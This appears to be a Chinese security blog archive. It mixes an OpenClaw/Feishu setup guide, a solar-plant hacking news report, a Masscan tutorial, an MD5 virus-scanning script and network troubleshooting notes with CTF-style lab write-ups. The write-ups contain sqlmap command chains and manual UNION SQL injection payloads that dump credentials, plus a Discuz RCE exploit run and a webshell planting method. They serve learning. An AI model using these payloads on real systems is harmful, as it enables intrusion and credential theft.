信安365

“龙虾”养成记：虚拟机部署openclaw并与飞书对接

Sat, 07 Mar 2026 14:46:30 +0800

项目	要求
操作系统	debian 12
node	22.0.0或更高版本
包管理器	pnpm或npm
代码管理工具	git

最低配置建议（硬件）

CPU：2 核以上（建议 4 核）

内存：4 GB 起步（建议 8 GB+）

磁盘：至少 5 GB 可用空间

一、更新系统及安装基础工具

sudo apt update && sudo apt upgrade -y

sudo apt install -y curl wget git python3 build-essential libssl-dev ufw

二、安装nodejs

curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -

sudo apt install -y nodejs

node --version

npm --version

三、翻墙

翻墙我用的是Clash Verge

四、安装openclaw

curl -fsSL https://openclaw.ai/install.sh | bash

注意，如果你的debian是英文版，需要执行以下语句，防止中文乱码

export.UTF-8

export LC_ALL=C.UTF-8

选yes继续

这里我用的是阿里云百练

注：安装插件要等一段时间的，1，2分钟。

注：这里要提前申请飞书的应用凭证

到此安装已经完成。

你可以在命令行中输入内容进行测试。

因为安装使用的地址是本地回环地址，在虚拟机以外无法访问。需要ssh代理转发出来。

ssh -N -L 18789:127.0.0.1:18789 root@192.168.72.184

这样，在实体机中就可以用http://127.0.0.1:18789进行访问了。

访问时出现了这样的错误

那是因你，没有配置token。

点击连接即可成功

现在可以对话了。

我们再看看飞书中的使用。

在对话前要做个配对，按提示做即可。

现在可以正常使用了。

能够操作授权的命令

完工大吉！！！

CMS系统漏洞分析溯源(第6题)

Mon, 06 Jan 2025 21:16:49 +0800

启动靶机，访问后显示的是这个页面，根据题的提示，首先用web目录扫描工具进行扫描。我用的是kali下的dirburster,目录字典是自带的。

扫描结果如下图，然后逐一测试，看是否能访问，是否能找到后台登录界面。

当测试到这一地址（http://124.70.71.251:49521/servlets/page.php）时，

显示如下页面。

这应该就是后台登录页面了。

首先想到的是登录密码暴力破解，那用户名是什么呢？肯定不是admin。那仔细观察首面，看到了2个账号信息，分别为：mozhe666和mozhe777

那就使用burp suite进行破解吧。

遍历结束，未发现密码。

再用mozhe777这个账号试试，发现有个密码，输入后，reponse的信息长度有变化

那就用这个密码登录试试

嘿，登录成功了！！！

那现在怎么把shell放上去呢？我测试在头像上传php文件，被拒绝，只能上传图片，找到上传zip文件的地方，也只能上传压缩包，整体系统应该不存在上传漏洞。

研究了一下午，发现数据这页里面有备份和导入功能。

那我是不是可以先备份下来，然后再修改sql语句，利用mysql写入一句话木马呢？

那就先备份一下数据库，看看是什么内容。结果是这样的内容，那我改改sql语句，看看是否能够成功写入木马。

在写入木马之前，这里还有一个问题，这个网站的物理地址是什么呢？哪里有这个信息呢，于是又去网站找了一翻，嘿，竟然找了近1个小时。

找到了这个页面。

有了这个绝对地址，那就好办了。把备份下来的sql文件修改一下。我是在最后添加了这样一句话：

然后导入

访问一下试试，确实已写入成功

使用蚊剑进行连接

现在可以随意访问了。

在系统的根目录找到KEY

好了，要休息了，2025-01-06 21：15！！！！

SQL过滤字符后手工注入漏洞测试(第3题)

Sun, 05 Jan 2025 09:29:53 +0800

启动靶场后，仔细观察，测试登录，无漏洞，测试通知，存在sql注入

在这里，偷个懒，先用sqlmap跑一下。

python sqlmap.py -u "http://124.70.64.48:48706/new_list.php?id=1" -p id --level 5 --risk 3 --dbs --batch

暴数据库列表

很明显，min_ju4t_mel1i是我们要的数据库，继续

暴表

python sqlmap.py -u "http://124.70.64.48:48706/new_list.php?id=1" -p id --level 5 --risk 3 -D min
_ju4t_mel1i -tables --batch

根据题目上的提示，表stormgroup_member看上去是我们需要的。那先暴这个表中的字段吧。

python sqlmap.py -u "http://124.70.64.48:48706/new_list.php?id=1" -p id --level 5 --risk 3 -D min_ju4t_mel1i -T stormgroup_member --cloumns --batch

dump下name和password

python sqlmap.py -u "http://124.70.64.48:48706/new_list.php?id=1" -p id --level 5 --risk 3 -D min_ju4t_mel1i -T stormgroup_member --dump --batch

根据表中的status，为1的用户才可使用，使用mozhe3登录，我去，账号和密码错误，那说明不是这个表。那再试试这个表(@dmin9_td4b}

这里要注意了，这个表名有点特殊，有特殊字符，这个简单，使用转义技巧来确保SQLMap生成的SQL语句正确执行。暴字段的语句如下：

python sqlmap.py -u "http://124.70.64.48:48706/new_list.php?id=1" -p id --level 5 --risk 3 -D min_ju4t_mel1i -T  "`(@dmin9_td4b}`" --columns --batch

再dump下字段内容

python sqlmap.py -u "http://124.70.64.48:48706/new_list.php?id=1" -p id --level 5 --risk 3 -D min_ju4t_mel1i -T  "`(@dmin9_td4b}`" --dump -C status,username,password --batch

这里，也是只有mozhe3用户未禁用，将哈希值放到md5中查询。

再登录系统试试，能够成功登录，并找到key

mozhe08d33cd3b9c31e075575fd088fa

好了，明天继续手功完成这一操作。

现在是2025年01月05日，早上8：29，现在继续进行手功注入。

首看这个注入点是数字型的还是字符型的。

在注入点分别输入1，1+2,发现没变化，初就判断为字符型注入

再输入字符a，看看是什么结果，从这里来看，应该是字符型的注入了

那就先进行暴数据库名，在这里，要想暴数据库名，那首先要知道查询结果中会有多少列。通过上图的表看，查询结果中至少有5个字段（除了上面显示的商品名称、商品类型、商品品牌，商品价格4个名，应该还有一个看不到的id。那先测试一下吧。

这里要注意，id=-1是为了这个条件查不出结果，而是要使用后面查询的结果。

http://124.70.64.48:43657/new_list.php?id=-1' union select 1,2,3,4,5;

发现提示：列名数量不一致。

那就再增加1个

http://124.70.64.48:43657/new_list.php?id=-1' union select 1,2,3,4,5,6;

还是同样的提示

那再增加1列

http://124.70.64.48:43657/new_list.php?id=-1' union select 1,2,3,4,5,6,7;

这时有结果了：

那我们就在3这个位置暴当前数据库名吧，输入：

http://124.70.64.48:43657/new_list.php?id=-1' union select 1,2,database(),4,5,6,7;

当前的数据库名已暴出，如果想暴出所有数据库名怎么做呢？

使用以下语句：

http://124.70.64.48:43657/new_list.php?id=-1' union select 1,2,(select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),4,5,6,7;

所有数据库名就出来了。

现在知道了数据库名，那就看看有哪些表吧。

http://124.70.64.48:43657/new_list.php?id=-1' union select 1,2,(select group_concat(0x7e,table_name,0x7e)  from information_schema.tables where table_schema="min_ju4t_mel1i"),4,5,6,7;

表已暴出，那现在暴字段了。

http://124.70.64.48:43657/new_list.php?id=-1' union select 1,2,(select group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema="min_ju4t_mel1i" and table_name="(@dmin9_td4b}"),4,5,6,7;

现在开始暴字段中的内容。

http://124.70.64.48:43657/new_list.php?id=-1' union select 1,2,(select group_concat(status,0x3a,username,0x3a,password) from `(@dmin9_td4b}` ),4,5,6,7;

手工注入到此结束！！！

CMS系统漏洞分析溯源(第9题)

Sat, 04 Jan 2025 12:37:16 +0800

三天不学习，赶不上刘少奇；一天不用功，赶不上毛泽东。后面那半句是我加上的：）

使用AppScan扫描无果（虽然暴有很多漏洞，但无法被利用）

使用AWVS扫描也无果

就想到网上应该暴Discuz漏洞，于是到github上搜索了一翻。果然找到这样一个工具。

https://github.com/tr0uble-mAker/POC-bomber.git

其中一个POC是关于6，7版本的漏洞

于是下载下来，进行扫描，给你来个意外惊喜：）

python pocbomber.py -u http://124.70.71.251:45514/ --poc="discuz67x_rce.py" --attack

那就下载个蚁剑吧，使用蚁剑连接

连接成功！！！！

那就在目录里找找你的key吧。

晕的，找了半天，这个key竟然在根目录。

提交KEY

全球首例！黑客劫持了光伏电站，新能源系统还安全吗？

Tue, 28 May 2024 07:47:43 +0800

光伏（PV）系统作为电网的重要组成部分，其运行和维护越来越依赖于标准的信息技术（IT）计算和网络基础设施。然而，这种依赖性使光伏系统面临更高的脆弱性和网络攻击风险。

5月1日，日本媒体《产经新闻》报道，黑客劫持了大约800个太阳能发电设施远程监控设备，其中部分设备被滥用以窃取银行账户并骗取存款。黑客在网络攻击过程中接管了这些设备，以隐藏他们的在线身份。这可能是全球首例公开证实的针对太阳能电网基础设施的网络攻击。

据电子设备制造商Contec称，该公司生产的SolarView Compact远程监控设备被滥用。该设备连接到互联网，由运营发电设施的公司用来监控发电量并检测异常情况。Contec已售出约 10,000 台设备，但截至2020年，其中约 800 台设备在应对网络攻击方面存在缺陷。

据悉，攻击者利用了Palo Alto Networks在2023年6月发现的一个漏洞（CVE-2022-29303）传播Mirai僵尸网络。攻击者甚至在Youtube上发布了如何SolarView系统上利用漏洞的“教学视频”。

黑客利用该缺陷渗透远程监控设备并设置“后门”程序，使它们能够从外部进行操纵。他们操纵设备非法连接网上银行，将资金从金融机构账户转入黑客账户，从而盗取资金。Contec随后在2023年7月18日修补了该漏洞。

2024 年5月7日，Contec确认远程监控设备遭受了最新攻击，并对由此造成的不便表示歉意。该公司向发电设施运营商通报了这一问题，并敦促他们将设备软件更新到最新版本。

在接受分析师采访时，韩国网络安全公司S2W表示，这次攻击的幕后黑手是一个名为Arsenal Depository的黑客组织。2024年1月，S2W曾指出该组织在日本政府排放福岛核电站污染水后，发起了针对日本基础设施的“日本行动”黑客攻击。

对于人们对发电设施可能会受到干扰的担心，专家表示，明显的经济动机让他们相信攻击者的目标不是电网运营。DER Security 首席执行官 Thomas Tansy表示：“此次攻击中，黑客寻找的是可以用来进行敲诈勒索的计算设备。劫持这些设备与劫持工业摄像头、家用路由器或其他联网设备并无二致。”

不过，此类攻击的潜在风险巨大。Thomas Tansy补充说道：“但是，如果黑客的目标转向破坏电网，完全可以利用这些未打补丁的设备实施更具破坏性的攻击（例如中断电网），因为攻击者已经成功进入系统，他们只需要再学习一些光伏领域的专业知识。"

Secura 团队经理Wilem Westerhof指出，访问监控系统将授予对实际光伏装置的一定程度的访问权限，你可以尝试利用该访问权限来攻击同一网络中的任何东西。Westerhof同时警告称，大型光伏电网通常有一个中央控制系统，如果被入侵，黑客可以接管不止一个光伏电场，频繁关闭或打开光伏设备，对光伏电网的运营造成严重影响。

安全专家指出，由太阳能电池板组成的分布式能源 (DER) 面临的网络安全风险更为严重，而光伏逆变器在此类基础设施中发挥着关键作用。后者负责将太阳能板产生的直流电转换为电网使用的交流电，是电网控制系统的接口。最新的逆变器具有通信功能，可连接到电网或者云服务，这增加了这些设备被攻击的风险。受损的逆变器不仅会破坏能源生产，还会造成严重的安全风险并损害整个电网的完整性。

北美电力可靠性公司（NERC）警告称，逆变器的缺陷对大容量电力供应（BPS）可靠性构成“重大风险”，并可能导致“大面积停电”。美国能源部在2022年曾警告说，针对逆变器的网络攻击可能会降低电网的可靠性和稳定性。

2023年5月，荷兰国家数字基础设施督察局(RDI)的研究人员报告称，他们检查了8家制造商的9种逆变器，发现没有一款符合RDI的安全标准。研究人员表示：“这意味着太阳能电池板装置等很容易受到黑客攻击，被关闭或用于DDoS攻击。用户和运营数据也可能会被窃取。”

除了光伏系统，风力发电场同样面临着网络威胁。据风险咨询公司 DNV 发布的能源网络威胁报告显示，2017 年，塔尔萨大学的研究人员在风电场运营商的许可下，对美国未具名风电场进行了黑客攻击实验，以测试其漏洞。

报道称，研究人员撬开锁进入风力涡轮机底座的腔室。他们进入了涡轮机的服务器，获得了代表现场每个联网涡轮机的 IP 地址列表。然后他们让涡轮机停止转动。

卡巴斯基 ICS CERT 的高级研究员 Stephan Gerling 表示，传统的天然气和核能发电厂通常在与外界隔绝的隔离 IT 基础设施上运行，因此它们受到网络攻击的可能性比物理破坏的可能性要小。相比之下，全球各地越来越多的小型可再生能源装置采用各种第三方系统运行，这些系统以数字方式连接到电网，并且低于安全部门设定的发电监控门槛，能源转型带来的网络漏洞将会日益严重。

随着世界向可再生能源转型，确保能源系统能够抵御网络威胁对于保护能源基础设施和维持电网稳定至关重要。

batch_dot的理解

Sun, 09 Oct 2022 21:05:13 +0800

最近对人工智能很感兴趣，业余时间研究图深度学习，在学习过程中遇到这这样一个函数：keras.backend.batch_dot(x, y, axes=None)

对这个函数中的axes参数一直不理解，看官方的解析：

批量化的点积
当 x 和 y 是批量数据时， batch_dot 用于计算 x 和 y 的点积， 即尺寸为 (batch_size, :)。
batch_dot 产生一个比输入尺寸更小的张量或变量。 如果维数减少到 1，我们使用 expand_dims 来确保 ndim 至少为 2。
参数
x: ndim >= 2 的 Keras 张量或变量。
y: ndim >= 2 的 Keras 张量或变量。
axes: 表示目标维度的整数或列表。 axes[0] 和 axes[1] 的长度必须相同。
返回
一个尺寸等于 x 的尺寸（减去总和的维度）和 y 的尺寸（减去批次维度和总和的维度）的连接的张量。 如果最后的秩为 1，我们将它重新转换为 (batch_size, 1)。
例子
假设 x = [[1, 2], [3, 4]] 和 y = [[5, 6], [7, 8]]， batch_dot(x, y, axes=1) = [[17], [53]] 是 x.dot(y.T) 的主对角线， 尽管我们不需要计算非对角元素。
伪代码：
inner_products = []
for xi, yi in zip(x, y):
    inner_products.append(xi.dot(yi))
result = stack(inner_products)
尺寸推断： 让 x 的尺寸为 (100, 20)，以及 y 的尺寸为 (100, 30, 20)。 如果 axes 是 (1, 2)，要找出结果张量的尺寸， 循环 x 和 y 的尺寸的每一个维度。
x.shape[0] : 100 : 附加到输出形状，
x.shape[1] : 20 : 不附加到输出形状， x 的第一个维度已经被加和了 (dot_axes[0] = 1)。
y.shape[0] : 100 : 不附加到输出形状，总是忽略 y 的第一维
y.shape[1] : 30 : 附加到输出形状，
y.shape[2] : 20 : 不附加到输出形状， y 的第二个维度已经被加和了 (dot_axes[0] = 2)。 output_shape = (100, 30)

以上解释看的我一头雾水，没办法，自己写程序测试，研究吧。测试程序如下：

import numpy as np
from tensorflow.keras import backend as K

arr12=np.array(
        [[[[0,1],[3,4],[6,7]]],
        [[[0,5],[3,4],[6,7]]],
        [[[0,1],[3,4],[6,7]]]]) #(3,1,3,2)

arr13=np.array([[0,1,2],[3,4,5],[6,7,8]]) #(3,3)
c = K.batch_dot(arr12, arr13, axes = [2,1])

print(c.shape, c)

其输出结果如下：

那axes的作用到底是什么呢？通俗的讲是指定参与运算的轴。以上程序运行过程用以下图形展示：

其中a就是程序中的arr12张量，b就是arr13张量。axes=[2,1],表示a中的第三个维度（即shape数值3）与b中的第二个维度（即shape数值3）进行点击运算（注，维度索引从0开始）。具体运算过程看上图。

经过反复测试和验证，目前基本理解axes的参数是批张量中哪些维度参与运算，以上是个人理解，有不正之处，请大佬指正！

学习犹如逆水行舟，不进则退！加油！！！

Windows下使用Masscan【摘抄】

Fri, 12 Aug 2022 13:57:25 +0800

Windows使用Masscan

0x00 前⾔

Masscan号称最快的互联⽹端⼝扫描器,本⽂来探测⼀下Masscan在Windows下的安装和使⽤。

masscan的扫描结果类似于nmap，在内部，它更像scanrand, unicornscan, and ZMap，采⽤了异步传输的⽅式。它和这些扫描器最主要的区别是，它⽐这些扫描器更快。⽽且，masscan更加灵活，它允许⾃定义任意的地址范和端⼝范围。

0x01 Windows下编译Masscan

Masscan需要经过编译才能⽣成exe⽂件在Windows下使⽤。

Masscan下载地址：

编译⼯具：vs2012

编译选项中未添加vs2012的编译配置，所以直接编译会报错

解决⽅法：

在string_s.h中添加vs2012配置信息

位于misc-string_s.h,添加代码如下：

#if defined(_MSC_VER) && (_MSC_VER == 1700)

/*Visual Studio 2012*/

# include <stdio.h>

# include <string.h>

# define strcasecmp _stricmp

# define memcasecmp _memicmp

# ifndef PRIu64

# define PRIu64 "llu"

# define PRId64 "lld"

# define PRIx64 "llx"

# endif

编译成功，执⾏masscan.exe，提⽰Packet.dll: not found

如下图

Packet.dll获取⽅法：

安装WinPcap后在System32下获得

WinPcap下载地址：

在另⼀系统安装WinPcap，在System32下找到Packet.dll和Wpcap.dll，复制到测试系统下masscan.exe的同级⽬录，再次运⾏

程序正常启动，但是⽆法扫描，报错如下：

FAIL: Error opening adapter: 系统找不到指定的设备。 (20) adapter[\Device\NPF_{71D19B82-0818-4685-A8E7-A6C7C812F2EA}].init: failed

0x02 安装WinPcap

官⽹下载安装即可。

0x03 Masscan使⽤

扫描指定⽹段和端⼝：

masscan.exe -p80 192.168.81.1/24

找到⼀台开启80端⼝的服务器，回显如下：

Discovered open port 80/tcp on 192.168.81.143

扫描指定主机所有开放的端⼝：

masscan.exe -p0-65535 192.168.81.143

如下图

扫描指定主机的特定端⼝：

masscan.exe -p80,443 192.168.81.143

获取banner：

masscan.exe -p80,443,3306 192.168.81.143 --banners

通过配置⽂件启动扫描：

将配置信息保存在1.conf:

masscan.exe -p80,443,3306 192.168.81.143 --banners --echo>1.conf

读取配置信息1.conf，启动扫描:

masscan.exe -c 1.conf

修改扫描速度为100,000包/秒（Windos下最⼤为 300,000包/秒），默认100包/秒：

--rate 100000

扫描结果可以以不同的格式输出：(XML是默认格式)

-oX <filespec> (XML)

-oB <filespec> (Binary)

-oG <filespec> (Grep)

-oJ <filespec> (Json)

-oL <filespec> (List)

-oU <filespec> (Unicornscan format)

默认情况，masscan开启如下配置：

-sS: 半开放扫描,不完成完整的TCP/IP连接

-Pn: 跳过主机发现

-n: 跳过DNS解析

--randomize-hosts:随机化扫描

--send-eth:使⽤libpcap数据包传输详细参数

<ip/range> IP地址范围，有三种有效格式：1、单独的IPv4地址 2、类似"10.0.0.1-10.0.0.233"的范围地址 3、CIDR地址类似于"0.0.0.0/0"，多个⽬标可以⽤都好隔开

-p <ports,--ports <ports>> 指定端⼝进⾏扫描

--banners 获取banner信息，⽀持少量的协议

--rate <packets-per-second> 指定发包的速率

-c <filename>, --conf <filename> 读取配置⽂件进⾏扫描

--echo 将当前的配置重定向到⼀个配置⽂件中

-e <ifname> , --adapter <ifname> 指定⽤来发包的⽹卡接⼝名称

--adapter-ip <ip-address> 指定发包的IP地址

--adapter-port <port> 指定发包的源端⼝

--adapter-mac <mac-address> 指定发包的源MAC地址

--router-mac <mac address> 指定⽹关的MAC地址

--exclude <ip/range> IP地址范围⿊名单，防⽌masscan扫描

--excludefile <filename> 指定IP地址范围⿊名单⽂件

--includefile，-iL <filename> 读取⼀个范围列表进⾏扫描

--ping 扫描应该包含ICMP回应请求

--append-output 以附加的形式输出到⽂件

--iflist 列出可⽤的⽹络接⼝，然后退出

--retries 发送重试的次数，以1秒为间隔

--nmap 打印与nmap兼容的相关信息

--http-user-agent <user-agent> 设置user-agent字段的值

--show [open,close] 告诉要显⽰的端⼝状态，默认是显⽰开放端⼝

--noshow [open,close] 禁⽤端⼝状态显⽰

--pcap <filename> 将接收到的数据包以libpcap格式存储

--regress 运⾏回归测试，测试扫描器是否正常运⾏

--ttl <num> 指定传出数据包的TTL值，默认为255

--wait <seconds> 指定发送完包之后的等待时间，默认为10秒

--offline 没有实际的发包，主要⽤来测试开销

-sL 不执⾏扫描，主要是⽣成⼀个随机地址列表

--readscan <binary-files> 读取从-oB⽣成的⼆进制⽂件，可以转化为XML或者JSON格式.

--connection-timeout <secs> 抓取banners时指定保持TCP连接的最⼤秒数，默认是30秒。Nmap功能

Masscan可以像nmap许多安全⼈员⼀样⼯作。这⾥有⼀些其他类似nmap的选项：通过传递–nmap开关可以看到类似nmap的功能。

1. -iL filename：从⽂件读取输⼊。

2. ‐‐exclude filename：在命令⾏中排除⽹络。

3. ‐‐excludefile：从⽂件中排除⽹络。

4. -S：欺骗源IP。

5. -v interface：详细输出。

6. -vv interface：⾮常冗长的输出。

7. -e interface：使⽤指定的接⼝。

病毒排查辅助工具【备忘录】

Sat, 06 Aug 2022 17:17:09 +0800

一、背景

已获取病毒文件的MD5值，在内网各计算机中排查是否存在同样的病毒。

二、工具运行环境要求

要能够同时在windows xp 32位，windows 7 32和64位 ,windows server 2003、windows server 2008、windows 10 64位等系统中运行。

三、开发环境

Python 2.7.14,

py2exe-0.6.9.win32-py2.7

windows xp 32位

py2exe下载地址 py2exe - Browse /py2exe/0.6.9 at SourceForge.net

Python 2.7.14 下载地址 https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi

其主页面为 Python Releases for Windows | Python.org

三、环境安装

直接在windows xp 中安装python 2.7.14和py2exe-0.6.9.win32-py2.7

安装完成后，输入以下命令进行确认

python -V
python mysetup.py py2exe --help

如果出现以下画面，表示安装成功！

四、工具完整代码

# -*- coding: GB2312 -*-
"""
@Copyright: Copyright?2022-2025 All Rights Reserved
@File name: scanfiles.py
@Version:1.1
@File function description: Scan MD5 consistent files
@Creation date: 2022-08-05 20:30:00
@Created by: Old Charlie
@Modification ID:
@Modification Description:
@Modified on:
"""
import os
import sys
import hashlib
import getopt
import time
import argparse
import signal
#存放已知病毒文件的MD5值
md5list = []
#存放找到的病毒文件名称
fnameList = []
#存放匹配的文件数量
md5num = 0
#扫描文件夹
dpath = 'c:\\windows'
#记录扫描开始时间
n1 = time.time()
starttime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(n1))
#记录共扫描的文件数量
file_num = 0
#结束处理信号里
stop = False
#定义处理信号量的函数
def my_handler(signum, frame):
    global stop
    stop = True
signal.signal(signal.SIGINT, my_handler)
#输入参数
try:
    opts,args = getopt.getopt(sys.argv[1:], "hp:", ["path=", "help"])
    for opt, path in opts:
        if opt=="--path" or opt=="-p":
            # print(path)
            dpath = path
        #添加帮助信息 2022-08-06 21:35
        elif opt=="--help" or opt=="-h":
            print("*"*40)
            print("默认扫描c:\windwos")
            print("*"*40)
            parser = argparse.ArgumentParser()
            example = parser.add_argument_group("Example")
            example.add_argument("-p", dest="短参数",
            help="scanfiles.exe -p \"C:\Program Files\"")
            example.add_argument("--path", dest="长参数",
            help="scanfiles.exe --path=\"C:\Program Files\"")
            args = parser.parse_args()
            parser.print_help()
        else:
            print("请输入正确的参数!")
            sys.exit(0)
except Exception as e:
    #raise
    print('请输入正确的参数！')
    sys.exit(0)
finally:
    pass
#读取配置文件内容
with open('md5v.ini') as file:
     content=file.readlines()
     for l in content:
         _l = l.strip()
         if len(_l) > 0:
             md5list.append(l.rstrip())
#遍历文件目录及子目录中的文件
for dirpath, dirnames, filenames in os.walk(dpath):
    if stop:
        break
    for filename in filenames:
        if stop:
            break
        file_num = file_num + 1
        print(os.path.join(dirpath, filename))
        try:
            tmp_filename = os.path.join(dirpath, filename)
            with open(tmp_filename, 'rb') as fp:
                data = fp.read()
                file_md5= hashlib.md5(data).hexdigest()
                # print(file_md5)
                if file_md5 in md5list:
                    md5num = md5num+1
                    fnameList.append(tmp_filename)
        except Exception as e:
            pass
        finally:
            pass
#扫描结束时间
n2 = time.time()
endtime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(n2))
#扫描结束时间差（秒数）
s = int(round((n2-n1) % 60))
#扫描结束时间差（分钟数）
m = int((n2-n1) / 60)
#打印40个*号
myinfo = """
########################################
******** www.itsec365.cn ***************
******** Version: 1.1 ******************
****Modified on: 2022-08-06 21:35*******
***** Welcome to this tool！************
########################################
"""
print(myinfo)
print('*'*40)
print('** 开始时间:'+starttime)
print('** 结束时间:'+endtime)
print('** 匹配到'+str(md5num)+'个文件')
for fn in fnameList:
    print(fn)
print('** 共查询'+ str(file_num) + '个文件')
print('** 用  时：'+str(m)+'分 '+str(s)+'秒')
print('*'*40)

五、生成exe文件

编写setup文件，这个文件的文件随意，我的为mysetup.py,其具体内容为：

from distutils.core import setup
import py2exe
includes = []
setup(console=[{"script":"scanfiles.py"}], 
    options={"py2exe":{"bundle_files": 1, "compressed":True, "includes": includes}}, 
    zipfile = None)

使用以下命令生成exe文件

python mysetup.py py2exe

六、制作测试用的MD5值

使用Cygwin64 Terminal下的md5sum.exe工具生成文件的MD5值，把对应的文件拷贝到各系统某一目录下，进行工具测试，确认是否能够通过MD5值扫描到对应文件。

注：需要将以下MD5值拷贝到md5v.ini配置文件中

$ md5sum.exe 'Wireshark 从入门到精通【学习网络必备】 (1).pdf'
82e9ac7a9d28a2f28b84953184c3ea8b *Wireshark 从入门到精通【学习网络必备】 (1).pdf

Administrator@DESKTOP-MQD5HNE /cygdrive/e/999-学习资料/007-wireshark
$ md5sum.exe Wireshark_Display_Filters.pdf
5be0f7e39fb4a7f8ec90b34bfa08e1b2 *Wireshark_Display_Filters.pdf

1、在windows 10下测试

扫描结果正确

2、windows xp系统测试

扫描结果正确

3、windows 7 64 测试

扫描结果正确

4、windows 7 32位测试

扫描结果正确

5、windows server 2012

扫描结果正确

6、windows server 2008

扫描结果正确

7、windows server 2003测试

扫描结果正确

2022-08-06 完善一下提示信息

可以针对业务场景调整工具编写方法，以提高扫描速度。

CentOS已收到icmp请求，但未答复的问题解决方法

Sat, 25 Jun 2022 14:39:15 +0800

有两台服务器，信息如下：

服务器A：

Ip: 10.6.214.15

路由信息如下：

Destination Gateway Genmask Flags Metric Ref Use Iface

0.0.0.0 10.6.214.254 0.0.0.0 UG 0 0 0 bond0

10.6.214.0 0.0.0.0 255.255.255.0 U 0 0 0 bond0

10.6.214.0 0.0.0.0 255.255.255.0 U 0 0 0 wangqiao214

10.6.215.0 0.0.0.0 255.255.255.0 U 0 0 0 wangqiao215

服务器A网卡信息

bond0: <BROADCAST,MULTICAST,MASTER,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000

link/ether f8:f2:1e:af:40:d8 brd ff:ff:ff:ff:ff:ff

inet 10.6.214.15/24 brd 10.6.214.255 scope global bond0

valid_lft forever preferred_lft forever

inet6 fe80::faf2:1eff:feaf:40d8/64 scope link

valid_lft forever preferred_lft forever

wangqiao215: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000

link/ether f8:f2:1e:af:40:d9 brd ff:ff:ff:ff:ff:ff

inet 10.6.215.5/24 brd 10.6.215.255 scope global wangqiao215

valid_lft forever preferred_lft forever

inet6 fe80::faf2:1eff:feaf:40d9/64 scope link

valid_lft forever preferred_lft forever

服务器B

Ip:10.6.215.41

路由信息如下：

Destination Gateway Genmask Flags Metric Ref Use Iface

10.6.215.0 0.0.0.0 255.255.255.0 U 0 0 0 bond0

10.10.10.0 0.0.0.0 255.255.255.0 U 0 0 0 em3

169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 em3

0.0.0.0 10.6.215.254 0.0.0.0 UG 0 0 0 bond0

当服务器A ping服务器B的时候，能够ping通，但是反过来，服务器B ping服务器A的时候ping不通，在服务器A上抓包发现服务器A是可以收到服务器B的icmp请求，但是不响应。

对服务器A的路由分析发现，数据包进来是通过bond0进来，而出去的时候是通过wangqiao215出去。

经查linux有这样一个内核参数：rp_filter

rp_filter （Reverse Path Filtering）参数定义了网卡对接收到的数据包进行反向路由验证的规则。他有三个值，0、1、2，具体含意如下：

0：关闭反向路由校验

1：开启严格的反向路由校验。对每个进来的数据包，校验其反向路由是否是最佳路由。如果反向路由不是最佳路由，则直接丢弃该数据包。

2：开启松散的反向路由校验。对每个进来的数据包，校验其源地址是否可达，即反向路由是否能通（通过任意网口），如果反向路径不通，则直接丢弃该数据包。

什么是反向路由校验

所谓反向路由校验，就是在一个网卡收到数据包后，把源地址和目标地址对调后查找路由出口，从而得到反身后路由出口。然后根据反向路由出口进行过滤。

当rp_filter的值为1时，要求反向路由的出口必须与数据包的入口网卡是同一块，否则就会丢弃数据包。

当rp_filter的值为2时，要求反向路由必须是可达的，如果反路由不可达，则会丢弃数据包。

问题解决

了解了rp_filter参数的作用，那我们就把这个参数修改一下吧。

sysctl net.ipv4.conf.all.rp_filter=2

或在/etc/sysctl.conf中添加net.ipv4.conf.all.rp_filter=2,然后运行命令：sysctl –p

服务器B ping服务器A的时候就可以ping通了。

参考资料：

https://www.jianshu.com/p/16d5c130670b

远程桌面拷贝文件慢的问题

Wed, 08 Jun 2022 08:29:07 +0800

最近在工作中遇到这样一个问题，新建的网络中分传统网络（暂且这样称呼，也可以说是普通网络）和SDN网络。其中传统网络中的一台服务器（定为客户端A）远程桌面登录到SDN网络中的服务器A，进行文件拷贝，发现传输速度特别慢，只有1-2M。实在不符合局域网的传输速度。有时还会发生0x800703E3错误。但是SDN网络内部的服务器，远程登录登录后拷贝文件就不存在这个问题，速度可达到60M以上，也不会出现以上错误。

现在有两个问题，第一，为什么传统网与SDN网间的服务器拷贝文件是这么慢呢？第二、为什么会出现0x800703E3错误。

那先解决第一个问题，首先抓取数据包进行分析（注，要在两台电脑上同时抓包）：

分析发现，远程桌面文件传输用的是UDPRDP协议（本协议详细内容可以参考微软文档：https://docs.microsoft.com/zh-tw/openspecs/windows_protocols/ms-rdpeudp/aea14a52-baa1-4486-bcd8-f30505ec707d）。我是第一次遇到这个协议，RDP不是在TCP协议之上的吗？怎么变成了UDP？再仔细分析所有数据包，全都正常。那就统计一下frame.time_delta,发现有好多大于0.1秒的帧，这就不太对了。

再分析哪些帧大于0.1秒的呢？经过分析发现，客户端在发送ACK之后，要等大约400毫秒左右再发送ACK+DATA，这时间也太长了。

我对这个UDPRDP协议不熟悉，只知道以前用的远程桌面走的是TCP协议，那把远程桌面改成TCP试试呢？

修改方法：

计算机配置-管理模板-Windows组件-远程桌面服务-远程桌面连接客户端-关闭客户端上的UDP 启用，客户端服务器两边都要设置，设置后重新远程桌面连接即可生效。

再次测试传输速度，发现已可达30M了。

至于0x800703E3错误，后来到网上查了一下，据说是远程桌面使用UDP导致的，换成了TCP协议以后，确实没出现过以上错误。

但为什么在SDN网络内的服务器之间远程桌面拷贝就没问题呢？哪位大牛可以给个答案？谢谢！